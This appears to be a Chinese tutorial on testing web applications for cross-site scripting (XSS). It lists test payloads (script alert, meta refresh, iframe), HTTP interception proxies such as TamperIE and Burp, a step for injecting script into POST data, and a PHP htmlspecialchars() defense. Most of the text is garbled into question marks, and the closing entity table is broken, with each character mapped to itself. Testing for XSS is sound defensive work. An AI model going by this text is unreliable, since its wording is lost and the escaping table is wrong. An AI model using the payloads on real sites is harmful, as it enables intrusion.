?????? WEB ??y??? XSS ??????????????????????? WEB ??????? XSS ??????Σ??????????? JavaScript ???????? XSS ?????????????????????????? XSS ??????????? JavaScript ???????·????

?????????? XSS ????
????XSS ??????????? JavaScript ??????絯?????????<script>alert("XSS");</script>
????XSS ??????????? HTML ????Σ???磺
??????????????? <meta http-equiv="refresh" content="0;">
???????????????????? <iframe src=http://xxxx width=250 height=250></iframe>
????XSS (Cross Site Scripting) Cheat Sheet ????????????? XSS ????????б?????????????? WEB ????????? XSS ????????????????????ν?? XSS ????????????????????б??????Щ XSS ??????????????????????????????????????? XSS ?????????????????
???????????
??????????????????????? Get/Post ??????????????????????????????е???????????? JavaScript ????齫?????????????????????????Щ??????? HTTP ?????????б??
Paros proxy (http://www.parosproxy.org)
Fiddler (http://www.fiddlertool.com/fiddler)
Burp proxy (http://www.portswigger.net/proxy/)
TamperIE (http://www.bayden.com/dl/TamperIESetup.exe)
??????????????? TamperIE ?? WEB ??y??а????????TamperIE С????????????? IE ?????????? Get/Post ????????????? SSL ????????? TamperIE + IE7 ???????????IE7 ????? IPV6 ??????????????????????? Web ???? IPV6 ?????????黹????? TamperIE + IE6 ??????
???????2???: TamperIE ????????????? JavaScript ??У?飬?? POST ????????????????????????????????????? name ?? message ???????罫 message ??????? "<script>alert(“XSS hole!!”);</script>"??????? ”Send altered data” ??????????????????????? Web ????????

? 2. ??? TamperIE ??? Post ????

????????????????????б???
????????? Web ??????????????????????????????????????????????????????????????????????????????????????????п???????????????????????????????????????ж???????????????????????????????????????????????????????й????綯???????? HTML ????????????????????? JavaScript ??????С???????????? PHP ????? Web ?????????"echo"??"print"??"printf"??"<?=" ??????????????????????????????????? PHP ??????? htmlspecialchars()???÷??????????? 5 ?? HTML ??????????????????????? HTML ??????????????Щ?????????μ? XSS ?????????????????????????????????塢?????????? XSS ??????
??????? PHP ?? htmlspecialchars() ??? HTML ???????
???????????о?? XSS ??????????????????Щ?????а??????Щ????? HTML ????? "<"??">"????????????????????????????????????????Щ HTML ??JavaScript ?????????????????Щ???????< > & “ ???????HTML?????????????壬????????????????????????????????????ж?????????????????????????н????
????HTML???????? & ??????????????? # ?????????????????????ɡ?????? HTML ???Щ?????????????е??????????????????ж??????????????絥?????

????PHP ????htmlspecialchars()????????? HTML ???????????????????????????????????????????????????? HTML ????????????????????????????Щ HTML ???????????????С?htmlspecialchars()????????????????? HTML ???????????????????
& ??? &
“ ??? "
< ??? <
> ??? >
‘ ??? '